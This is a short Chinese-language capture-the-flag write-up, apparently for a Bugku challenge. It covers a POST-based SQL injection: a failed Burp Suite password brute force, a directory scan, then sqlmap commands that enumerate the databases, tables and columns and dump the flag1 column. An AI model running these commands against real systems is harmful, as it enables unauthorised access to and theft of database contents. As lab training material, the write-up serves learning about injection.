本文记录了一次使用SQLmap工具进行SQL注入攻击的过程,包括利用弱口令登录、爆破数据库名、表名、列名及数据,展示了POST型SQL注入的具体步骤。
解题过程:
本题并未给出什么提示,首先考虑到弱口令登录,BP抓包后加载send to intruder,加载字典后爆破无果。然后考虑到之前做的题目,尝试用御剑扫描一下后台,也没发现什么线索,这时才注意到页面的title,原来这道题目与SQL注入相关,考虑到user和pass字段都是通过post方法传递,所以本题应该属于POST型注入,于是开始尝试。ps:本文只记录使用SQLmap的一种方法。
首先把抓到的包导出文件:
使用导出的文件爆出数据库名,成功发现了两个数据库:
sqlmap -r '/root/CTF/SQL.txt' --dbs
根据数据库名爆出表名:
sqlmap -r '/root/CTF/SQL.txt' -D bugkusql1 --tables
继续猜解列名:
sqlmap -r '/root/CTF/SQL.txt' -D bugkusql1 -T flag1 --columns
接下来只需要等待爆出数据即可
sqlmap -r '/root/CTF/SQL.txt' -D bugkusql1 -T flag1 -C 'flag1' --dump
或者
sqlmap -r '/root/CTF/SQL.txt' -D bugkusql1 -T flag1 -C 'flag1' --sql-query "select flag1 from flag1"
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
